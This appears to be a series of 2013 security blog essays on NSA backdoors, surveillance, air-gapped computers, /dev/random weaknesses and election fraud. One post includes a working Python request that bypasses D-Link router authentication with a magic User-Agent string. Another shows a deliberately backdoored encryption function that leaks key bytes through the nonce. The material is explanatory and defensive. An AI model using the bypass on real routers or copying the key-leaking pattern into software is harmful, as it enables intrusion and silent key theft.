  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It’s true we won’t know for sure if the code we’re seeing is the code that’s actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.
  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.
  • There should be no master secrets. These are just too vulnerable.
  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.
  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key, or should be public, predictable counters if possible. Again, the goal is to make it harder to subtly leak key bits in this information; the sketch after this list contrasts the two approaches.
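
A minimal sketch of that last point, using AES-GCM from the Python cryptography library. The subverted version is a caricature of the covert channel described above (it copies key bytes into the transmitted nonce), while the clean version derives the nonce from a message counter, so there is no random field on the wire in which to hide anything. It assumes the two endpoints share a key, keep their counters in sync, and never reuse a counter value with the same key:

    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    key = AESGCM.generate_key(bit_length=128)
    aead = AESGCM(key)

    def encrypt_subverted(plaintext: bytes):
        # Caricature of a backdoored implementation: the "random" nonce
        # actually carries 8 bytes of the key in the clear. The protocol
        # still interoperates; anyone watching the wire collects key bits.
        nonce = key[:8] + os.urandom(4)
        return nonce, aead.encrypt(nonce, plaintext, None)

    def encrypt_clean(counter: int, plaintext: bytes):
        # Deterministic 96-bit nonce from a per-key message counter:
        # nothing random goes on the wire, so there is nowhere to hide a
        # leak. The counter must never repeat for the same key.
        nonce = counter.to_bytes(12, "big")
        return nonce, aead.encrypt(nonce, plaintext, None)

    n, ct = encrypt_clean(1, b"hello")
    print(aead.decrypt(n, ct, None))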

This is a hard problem. We don’t have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater “attack surface” for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it’s supposed to do and nothing more. Unfortunately, we’re terrible at this. Even worse, there’s not a lot of practical research in this area—and it’s hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn’t just about the NSA, and legal controls won’t protect against those who don’t follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

Posted on October 22, 2013 at 6:15 AM

The Trajectories of Government and Corporate Surveillance

Historically, surveillance was difficult and expensive.

Over the decades, as technology advanced, surveillance became easier and easier. Today, we find ourselves in a world of ubiquitous surveillance, where everything is collected, saved, searched, correlated and analyzed.

But while technology allowed for an increase in both corporate and government surveillance, the private and public sectors took very different paths to get there. The former always collected information about everyone, but over time, collected more and more of it, while the latter always collected maximal information, but over time, collected it on more and more people.

Corporate surveillance has been on a path from minimal to maximal information. Corporations always collected information on everyone they could, but in the past they didn’t collect very much of it and only held it as long as necessary. When surveillance information was expensive to collect and store, companies made do with as little as possible.

Telephone companies collected long-distance calling information because they needed it for billing purposes. Credit cards collected only the information about their customers’ transactions that they needed for billing. Stores hardly ever collected information about their customers, maybe some personal preferences, or name-and-address for advertising purposes. Even Google, back in the beginning, collected far less information about its users than it does today.

As technology improved, corporations were able to collect more. As the cost of data storage became cheaper, they were able to save more data and for a longer time. And as big data analysis tools became more powerful, it became profitable to save more. Today, almost everything is being saved by someone—probably forever.

Examples are everywhere. Internet companies like Google, Facebook, Amazon and Apple collect everything we do online at their sites. Third-party cookies allow those companies, and others, to collect data on us wherever we are on the Internet. Store affinity cards allow merchants to track our purchases. CCTV and aerial surveillance combined with automatic face recognition allow companies to track our movements; so does your cell phone. The Internet will facilitate even more surveillance, by more corporations for more purposes.

On the government side, surveillance has been on a path from individually targeted to broadly collected. When surveillance was manual and expensive, it could only be justified in extreme cases. The warrant process limited police surveillance, and resource restraints and the risk of discovery limited national intelligence surveillance. Specific individuals were targeted for surveillance, and maximal information was collected on them alone.

As technology improved, the government was able to implement ever-broadening surveillance. The National Security Agency could surveil groups—the Soviet government, the Chinese diplomatic corps, etc.—not just individuals. Eventually, it could spy on entire communications trunks.

Now, instead of watching one person, the NSA can monitor “three hops” away from that person—an ever widening network of people not directly connected to the person under surveillance. Using sophisticated tools, the NSA can surveil broad swaths of the Internet and phone network.
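
The arithmetic of three hops is worth making explicit. Using the commonly cited figure of roughly 190 contacts per person, and ignoring the overlap between contact lists (so these are order-of-magnitude upper bounds), one target balloons into millions of people:

    # Back-of-the-envelope "three hops" arithmetic. 190 is a commonly cited
    # average number of contacts per person; real contact lists overlap, so
    # treat these as upper bounds on the order of magnitude.
    contacts_per_person = 190

    hop1 = contacts_per_person            # the target's own contacts
    hop2 = hop1 * contacts_per_person     # contacts of contacts
    hop3 = hop2 * contacts_per_person     # three hops out

    print(f"{hop1:>12,}")    #          190
    print(f"{hop2:>12,}")    #       36,100
    print(f"{hop3:>12,}")    #    6,859,000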

Governments have always used their authority to piggyback on corporate surveillance. Why should they go through the trouble of developing their own surveillance programs when they could just ask corporations for the data? For example, we just learned that the NSA collects e-mail, IM and social networking contact lists for millions of Internet users worldwide.

But as corporations started collecting more information on populations, governments started demanding that data. Through National Security Letters, the FBI can surveil huge groups of people without obtaining a warrant. Through secret agreements, the NSA can monitor the entire Internet and telephone networks.

This is a huge part of the public-private surveillance partnership.

The result of all this is we’re now living in a world where both corporations and governments have us all under pretty much constant surveillance.

Data is a byproduct of the information society. Every interaction we have with a computer creates a transaction record, and we interact with computers hundreds of times a day. Even if we don’t use a computer—buying something in person with cash, say—the merchant uses a computer, and the data flows into the same system. Everything we do leaves a data shadow, and that shadow is constantly under surveillance.

Data is also a byproduct of information society socialization, whether it be e-mail, instant messages or conversations on Facebook. Conversations that used to be ephemeral are now recorded, and we are all leaving digital footprints wherever we go.

Moore’s law has made computing cheaper. All of us have made computing ubiquitous. And because computing produces data, and that data equals surveillance, we have created a world of ubiquitous surveillance.

Now we need to figure out what to do about it. This is more than reining in the NSA or fining a corporation for the occasional data abuse. We need to decide whether our data is a shared societal resource, a part of us that is inherently ours by right, or a private good to be bought and sold.

Writing in the Guardian, Chris Huhne said that “information is power, and the necessary corollary is that privacy is freedom.” How this interplay between power and freedom plays out in the information age is still to be determined.

This essay previously appeared on CNN.com.

EDITED TO ADD (11/14): Richard Stallman’s comments on the subject.

Posted on October 21, 2013 at 6:05 AM

D-Link Router Backdoor

Several versions of D-Link router firmware contain a backdoor. Just set the browser’s user agent string to “xmlset_roodkcableoj28840ybtide,” and you’re in. (Hint: remove the number and read it backwards.)
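
If you want to check a router you own, it takes exactly one HTTP header. A minimal sketch, assuming a vulnerable device at the common default address 192.168.0.1; the exact address and admin-page path vary by model:

    import requests

    # The magic User-Agent that bypasses authentication on affected firmware.
    BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"

    # Hypothetical address of a router you own and are testing; the admin
    # page path differs between D-Link models.
    resp = requests.get(
        "http://192.168.0.1/",
        headers={"User-Agent": BACKDOOR_UA},
        timeout=5,
    )
    print(resp.status_code)
    print(resp.text[:200])  # the admin UI comes back with no login prompt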

It was probably put there for debugging purposes, but has all sorts of applications for surveillance.

Good article on the subject.

EDITED TO ADD (11/14): There are open-source programs available to replace the firmware.

Posted on October 18, 2013 at 12:03 PM

"A Court Order Is an Insider Attack"

Ed Felten makes a strong argument that a court order is exactly the same thing as an insider attack:

To see why, consider two companies, which we’ll call Lavabit and Guavabit. At Lavabit, an employee, on receiving a court order, copies user data and gives it to an outside party—in this case, the government. Meanwhile, over at Guavabit, an employee, on receiving a bribe or extortion threat from a drug cartel, copies user data and gives it to an outside party—in this case, the drug cartel.

From a purely technological standpoint, these two scenarios are exactly the same: an employee copies user data and gives it to an outside party. Only two things are different: the employee’s motivation, and the destination of the data after it leaves the company. Neither of these differences is visible to the company’s technology—it can’t read the employee’s mind to learn the motivation, and it can’t tell where the data will go once it has been extracted from the company’s system. Technical measures that prevent one access scenario will unavoidably prevent the other one.

This is why designing Lavabit to be resistant to court order would have been the right thing to do, and why we should all demand systems that are designed in this way.

Also on BoingBoing.

Posted on October 17, 2013 at 12:50 PM

SecureDrop

SecureDrop is an open-source whistleblower support system, originally written by Aaron Swartz and now run by the Freedom of the Press Foundation. The first instance of this system was named StrongBox and is being run by The New Yorker. To further add to the naming confusion, Aaron Swartz called the system DeadDrop when he wrote the code.

I participated in a detailed security audit of the StrongBox implementation, along with some great researchers from the University of Washington and Jacob Appelbaum. The problems we found were largely procedural, and things that the Freedom of the Press Foundation is working to fix.

Freedom of the Press Foundation is not running any instances of SecureDrop. It has about a half dozen major news organizations lined up, and will be helping them install their own starting the first week of November. So hopefully any would-be whistleblowers will soon have their choice of news organizations to securely communicate with.

Strong technical whistleblower protection is essential, especially given President Obama’s war on whistleblowers. I hope this system is broadly implemented and extensively used.

Posted on October 17, 2013 at 7:15 AM

iPhone Sensor Surveillance

The new iPhone has a motion sensor chip, and that opens up new opportunities for surveillance:

The M7 coprocessors introduce functionality that some may instinctively identify as “creepy.” Even Apple’s own description hints at eerie omniscience: “M7 knows when you’re walking, running, or even driving…” While it’s quietly implemented within iOS, it’s not secret for third party apps (which require an opt-in through pop-up notification, and management through the phone’s Privacy settings). But as we know, most users blindly accept these permissions.

It all comes down to a question of agency in tracking our physical bodies.

The fact that my Fitbit tracks activity without matching it up with all my other data sources, like GPS location or my calendar, is comforting. These data silos can sometimes be frustrating when I want to query across my QS datasets, but the built-in divisions between data about my body—and data about the rest of my digital life—leave room for my intentional inquiry and interpretation.

Posted on October 16, 2013 at 7:33 AM

New Secure Smart Phone App

It’s hard not to poke fun at this press release for SafeSlinger, a new cell phone security app from Carnegie Mellon.

“SafeSlinger provides you with the confidence that the person you are communicating with is actually the person they have represented themselves to be,” said Michael W. Farb, a research programmer at Carnegie Mellon CyLab. “The most important feature is that SafeSlinger provides secure messaging and file transfer without trusting the phone company or any device other than my own smartphone.”

Oddly, Farb believes that he can trust his smart phone.

This headline claims that “even [the] NSA can’t crack” it, but it’s unclear where that claim came from.

Still, it’s good to have encrypted chat programs. This one joins Cryptocat, Silent Circle, and my favorite: OTR.

Posted on October 15, 2013 at 12:37 PM • 29 Comments

Massive MIMO Cryptosystem

New paper: “Physical-Layer Cryptography Through Massive MIMO.”

Abstract: We propose the new technique of physical-layer cryptography based on using a massive MIMO channel as a key between the sender and desired receiver, which need not be secret. The goal is for low-complexity encoding and decoding by the desired transmitter-receiver pair, whereas decoding by an eavesdropper is hard in terms of prohibitive complexity. The decoding complexity is analyzed by mapping the massive MIMO system to a lattice. We show that the eavesdropper’s decoder for the MIMO system with M-PAM modulation is equivalent to solving standard lattice problems that are conjectured to be of exponential complexity for both classical and quantum computers. Hence, under the widely-held conjecture that standard lattice problems are hard to solve in the worst-case, the proposed encryption scheme has a more robust notion of security than that of the most common encryption methods used today such as RSA and Diffie-Hellman. Additionally, we show that this scheme could be used to securely communicate without a pre-shared secret and little computational overhead. Thus, the massive MIMO system provides for low-complexity encryption commensurate with the most sophisticated forms of application-layer encryption by exploiting the physical layer properties of the radio channel.
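
To make the setup concrete, here is a toy simulation of the linear model the abstract builds on: an M-PAM symbol vector passed through a MIMO channel matrix with additive noise. The parameters and the brute-force count below are my own illustration of why the eavesdropper’s search space grows exponentially with the antenna count; the paper’s actual encoding scheme and security reduction are more involved.

    import numpy as np

    # Toy illustration of the linear model behind the abstract: y = Hx + n,
    # with x drawn from an M-PAM constellation. Parameter values are my own
    # placeholders, not the paper's.
    M = 4                                    # M-PAM constellation size
    n_antennas = 8                           # a real "massive" array is far larger
    constellation = np.array([-3, -1, 1, 3])

    rng = np.random.default_rng(0)
    H = rng.normal(size=(n_antennas, n_antennas))     # MIMO channel matrix
    x = rng.choice(constellation, size=n_antennas)    # transmitted symbols
    y = H @ x + 0.1 * rng.normal(size=n_antennas)     # received vector

    # Without the structure the legitimate pair exploits, recovering x from y
    # is a closest-vector search over the lattice generated by H: there are
    # M ** n_antennas candidate symbol vectors, exponential in the array size.
    print("brute-force search space:", M ** n_antennas)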

MIMO stands for “multiple-input multiple-output.” I had to look that up.

In general, I’m not optimistic about the security of these sorts of systems. Whenever non-cryptographers come up with cryptographic algorithms based on some novel problem that’s hard in their area of research, invariably there are pretty easy cryptographic attacks.

So consider this a good research exercise for all budding cryptanalysts out there.

Posted on October 15, 2013 at 6:27 AM • 32 Comments

Insecurities in the Linux /dev/random

New paper: “Security Analysis of Pseudo-Random Number Generators with Input: /dev/random is not Robust,” by Yevgeniy Dodis, David Pointcheval, Sylvain Ruhault, Damien Vergnaud, and Daniel Wichs.

Abstract: A pseudo-random number generator (PRNG) is a deterministic algorithm that produces numbers whose distribution is indistinguishable from uniform. A formal security model for PRNGs with input was proposed in 2005 by Barak and Halevi (BH). This model involves an internal state that is refreshed with a (potentially biased) external random source, and a cryptographic function that outputs random numbers from the continually internal state. In this work we extend the BH model to also include a new security property capturing how it should accumulate the entropy of the input data into the internal state after state compromise. This property states that a good PRNG should be able to eventually recover from compromise even if the entropy is injected into the system at a very slow pace, and expresses the real-life expected behavior of existing PRNG designs. Unfortunately, we show that neither the model nor the specific PRNG construction proposed by Barak and Halevi meet this new property, despite meeting a weaker robustness notion introduced by BH. From a practical side, we also give a precise assessment of the security of the two Linux PRNGs, /dev/random and /dev/urandom. In particular, we show several attacks proving that these PRNGs are not robust according to our definition, and do not accumulate entropy properly. These attacks are due to the vulnerabilities of the entropy estimator and the internal mixing function of the Linux PRNGs. These attacks against the Linux PRNG show that it does not satisfy the “robustness” notion of security, but it remains unclear if these attacks lead to actual exploitable vulnerabilities in practice. Finally, we propose a simple and very efficient PRNG construction that is provably robust in our new and stronger adversarial model. We present benchmarks between this construction and the Linux PRNG that show that this construction is on average more efficient when recovering from a compromised internal state and when generating cryptographic keys. We therefore recommend to use this construction whenever a PRNG with input is used for cryptography.
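
For readers unfamiliar with the model: a PRNG “with input” exposes two operations, a refresh call that folds (possibly biased) external events into an internal state, and a next call that outputs pseudorandom bits and updates that state. The toy sketch below is my own illustration of that interface; it is not the paper’s provably robust construction, and it is not a substitute for /dev/urandom.

    import hashlib
    import os

    class ToyPRNGWithInput:
        """Illustrative PRNG-with-input interface: refresh() and next().
        A sketch of the model's shape only, not the paper's construction
        and not a replacement for os.urandom()."""

        def __init__(self, seed: bytes = b""):
            self.state = hashlib.sha256(seed).digest()

        def refresh(self, event: bytes) -> None:
            # Fold a (possibly low-entropy, possibly biased) input event
            # into the internal state.
            self.state = hashlib.sha256(self.state + event).digest()

        def next(self, n: int = 32) -> bytes:
            # Derive output and a new state from the current state.
            out = hashlib.sha256(self.state + b"out").digest()
            self.state = hashlib.sha256(self.state + b"next").digest()
            return out[:n]

    prng = ToyPRNGWithInput(os.urandom(32))
    prng.refresh(b"interrupt-timing-sample")
    print(prng.next(16).hex())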

Posted on October 14, 2013 at 1:06 PM • 121 Comments

New Low in Election Fraud

Azerbaijan achieves a new low in electoral fraud: the government accidentally publishes the results of the election before the polls open.

The mistake came when an electoral commission accidentally published results showing a victory for Ilham Aliyev, the country’s long-standing President, a day before voting. Meydan TV, an online channel critical of the government, released a screenshot from a mobile app for the Azerbaijan Central Election Commission which showed that Mr Aliyev had received 72.76 per cent of the vote compared with 7.4 per cent for the opposition candidate, Jamil Hasanli. The screenshot also indicates that the app displayed information about how many people voted at various times during the day. Polls opened at 8am.

Here’s another article.

But luckily, former US legislators are monitoring everything:

But observers from other delegations, including a group of former members of the United States House of Representatives, said the voting on Wednesday was clean and efficient. Mr. Aliyev, thanking voters in a televised statement, called the elections “free and transparent.”

Former Representative Michael E. McMahon, a Democrat from Staten Island, called the vote “honest, fair and really efficient.”

“There were much shorter lines than in America, and no hanging chads”—a reference to the disputed ballots in the United States presidential race in 2000.

Long lines? Hanging chads? These people have no idea how the big boys steal elections.

Posted on October 11, 2013 at 12:33 PM • 31 Comments

Air Gaps

Since I started working with Snowden’s documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use—or should use—air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama Bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they’re hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that’s not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there’s the potential for attack.

And air gaps have been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Russian in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden’s NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

  1. When you set up your computer, connect it to the Internet as little as possible. It’s impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend’s network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of that to the air gap machine using a one-way process.)

  2. Install the minimum software set you need to do your job, and disable all operating system services that you won’t need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That’s all. (No, I don’t have any inside knowledge about TrueCrypt, and there’s a lot about it that makes me suspicious. But for Windows full-disk encryption it’s that, Microsoft’s BitLocker, or Symantec’s PGPDisk—and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

  3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn’t get turned on by accident.

  4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it’s an attempt to make it harder for the attacker to target your computer.

  5. Turn off all autorun features. This should be standard practice for all the computers you own, but it’s especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

  6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don’t worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You’re not on the Internet, after all.

  7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don’t know—or one you find in a parking lot.

  8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can’t spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you’ve only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation—not read or write; I’ve got one of those—wins a prize.

  9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files (see the sketch after this list). If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can’t break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale.

  10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you’ll be moving public files and it won’t matter, but sometimes you won’t be, and it will. And if you’re using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don’t forget to encrypt the computer as well; whole-disk encryption is the best.
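
The random-fill step in rule 9 is easy to script. Here is a minimal sketch, assuming the transfer device is already mounted at a directory you can write to; the path and file names are hypothetical.

    import os
    import shutil

    def pad_with_random_files(mount_point: str, chunk_mb: int = 1) -> None:
        """Fill the free space on a transfer device with files of random data,
        leaving malware little room to stash stolen files. mount_point is the
        directory where the stick or disc staging folder is mounted."""
        chunk = chunk_mb * 1024 * 1024
        i = 0
        while shutil.disk_usage(mount_point).free >= chunk:
            path = os.path.join(mount_point, f"filler_{i:04d}.bin")
            with open(path, "wb") as f:
                f.write(os.urandom(chunk))
            i += 1

    # Example call (the path is hypothetical):
    # pad_with_random_files("/media/transfer")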

One thing I didn’t do, although it’s worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD—you can keep your data on an encrypted USB stick—is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it’s probably impossible to enforce for any network more complicated than a single computer with a single user. But if you’re thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you’re going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that’s too much paranoia for me right now.

This essay previously appeared on Wired.com.

EDITED TO ADD: Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

Posted on October 11, 2013 at 6:45 AM • 245 Comments

A New Postal Privacy Product

The idea is basically to use indirection to hide physical addresses. You would get a random number to give to your correspondents, and the post office would use that number to determine your real address. No security against government surveillance, but potentially valuable nonetheless.
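
As a sketch of the indirection idea (my own illustration, not the actual proposal): correspondents only ever see an opaque code, and the table mapping codes to street addresses stays with the carrier.

    import secrets

    # Toy model of address indirection: correspondents see only an opaque
    # code; the mapping from code to street address lives with the carrier.
    # This illustrates the concept, not the proposal's actual design.

    registry = {}  # held by the post office, never published

    def issue_code(real_address: str) -> str:
        code = secrets.token_hex(8)
        registry[code] = real_address
        return code

    def resolve(code: str) -> str:
        # Only the carrier performs this step, at delivery time.
        return registry[code]

    code = issue_code("123 Example Street, Anytown")
    print("give this to correspondents:", code)
    print("carrier resolves it to:", resolve(code))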

Here are a bunch of documents.

I honestly have no idea what’s going on. It seems to be something the US government is considering, but it was not proposed by the US Postal Service. This guy is proposing the service.

EDITED TO ADD (10/11): Sai has contacted me and asked that people refrain from linking to or writing about this for now, until he posts some more/better information. I’ll update this post with a new link when he sends it to me.

EDITED TO ADD (10/17): Sai has again contacted me, saying that he has posted the more/better information, and that the one true link for the proposal is here.

Posted on October 9, 2013 at 1:08 PM • 32 Comments

The NSA's New Risk Analysis

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and expose flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head—all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there’s too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that’s less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there’s not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.

This cost-benefit analysis doesn’t end at successful exploitation. According to Snowden, the TAO—that’s Tailored Access Operations—operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn’t work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turns them into what they call “cyberwarriors.” It’s not that they’re skilled hackers, it’s that the procedures do the work for them.
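
That trade-off reads like a small decision procedure. Here is a hedged sketch of the logic described above; the tier names, inputs, and stop conditions are my own placeholders, not actual FOXACID parameters.

    # Sketch of the exploit-selection trade-off described above. The tier
    # names, inputs, and stop rules are placeholders inferred from the essay,
    # not actual FOXACID parameters.

    def choose_exploit(target_value: str, sophistication: str) -> str:
        if target_value == "high" and sophistication == "low":
            return "rare zero-day"                 # worth the risk of burning it
        if target_value == "low" and sophistication == "high":
            return "already-known vulnerability"   # detection likely; spend nothing new
        return "less valuable exploit"             # the in-between cases

    def operator_should_stop(exploit_failed: bool, psp_detected: bool, anomaly: bool) -> bool:
        # The flowchart's rule of thumb: if anything goes weird, stop.
        return exploit_failed or psp_detected or anomaly

    print(choose_exploit("high", "low"))             # rare zero-day
    print(choose_exploit("low", "high"))             # already-known vulnerability
    print(operator_should_stop(False, True, False))  # PSP detected -> True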

And they’re super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it’s far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery—for example, if the target of an intelligence-gathering effort discovers that effort—but to have completely ignored the risks of those efforts becoming front-page news.

It’s not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback—for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won’t be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits against users.

This essay previously appeared in the Atlantic.

Posted on October 9, 2013 at 6:28 AM • 64 Comments

Why It's Important to Publish the NSA Programs

The Guardian recently reported on how the NSA targets Tor users, along with details of how it uses centrally placed servers on the Internet to attack individual computers. This builds on a Brazilian news story from mid-September that, in part, shows that the NSA is impersonating Google servers to users; a German story on how the NSA is hacking into smartphones; and a Guardian story from early September on how the NSA is deliberately weakening common security algorithms, protocols, and products.

The common thread among these stories is that the NSA is subverting the Internet and turning it into a massive surveillance tool. The NSA’s actions are making us all less safe, because its eavesdropping mission is degrading its ability to protect the US.

Among IT security professionals, it has long been understood that the public disclosure of vulnerabilities is the only consistent way to improve security. That’s why researchers publish information about vulnerabilities in computer software and operating systems, cryptographic algorithms, and consumer products like implantable medical devices, cars, and CCTV cameras.

It wasn’t always like this. In the early years of computing, it was common for security researchers to quietly alert the product vendors about vulnerabilities, so they could fix them without the “bad guys” learning about them. The problem was that the vendors wouldn’t bother fixing them, or took years before getting around to it. Without public pressure, there was no rush.

This all changed when researchers started publishing. Now vendors are under intense public pressure to patch vulnerabilities as quickly as possible. The majority of security improvements in the hardware and software we all use today is a result of this process. This is why Microsoft’s Patch Tuesday process fixes so many vulnerabilities every month. This is why Apple’s iPhone is designed so securely. This is why so many products push out security updates so often. And this is why mass-market cryptography has continually improved. Without public disclosure, you’d be much less secure against cybercriminals, hacktivists, and state-sponsored cyberattackers.

The NSA’s actions turn that process on its head, which is why the security community is so incensed. The NSA not only develops and purchases vulnerabilities, but deliberately creates them through secret vendor agreements. These actions go against everything we know about improving security on the Internet.

It’s folly to believe that any NSA hacking technique will remain secret for very long. Yes, the NSA has a bigger research effort than any other institution, but there’s a lot of research being done—by other governments in secret, and in academic and hacker communities in the open. These same attacks are being used by other governments. And technology is fundamentally democratizing: today’s NSA secret techniques are tomorrow’s PhD theses and the following day’s cybercrime attack tools.

It’s equal folly to believe that the NSA’s secretly installed backdoors will remain secret. Given how inept the NSA was at protecting its own secrets, it’s extremely unlikely that Edward Snowden was the first sysadmin contractor to walk out the door with a boatload of them. And the previous leakers could have easily been working for a foreign government. But it wouldn’t take a rogue NSA employee; researchers or hackers could discover any of these backdoors on their own.

This isn’t hypothetical. We already know of government-mandated backdoors being used by criminals in Greece, Italy, and elsewhere. We know China is actively engaging in cyber-espionage worldwide. A recent Economist article called it “akin to a government secretly commanding lockmakers to make their products easier to pick—and to do so amid an epidemic of burglary.”

The NSA has two conflicting missions. Its eavesdropping mission has been getting all the headlines, but it also has a mission to protect US military and critical infrastructure communications from foreign attack. Historically, these two missions have not come into conflict. During the Cold War, for example, we would defend our systems and attack Soviet systems.

But with the rise of mass-market computing and the Internet, the two missions have become interwoven. It becomes increasingly difficult to attack their systems and defend our systems, because everything is using the same systems: Microsoft Windows, Cisco routers, HTML, TCP/IP, iPhones, Intel chips, and so on. Finding a vulnerability—or creating one—and keeping it secret to attack the bad guys necessarily leaves the good guys more vulnerable.

Far better would be for the NSA to take those vulnerabilities back to the vendors to patch. Yes, it would make it harder to eavesdrop on the bad guys, but it would make everyone on the Internet safer. If we believe in protecting our critical infrastructure from foreign attack, if we believe in protecting Internet users from repressive regimes worldwide, and if we believe in defending businesses and ourselves from cybercrime, then doing otherwise is lunacy.

It is important that we make the NSA’s actions public in sufficient detail for the vulnerabilities to be fixed. It’s the only way to force change and improve security.

This essay previously appeared in the Guardian.

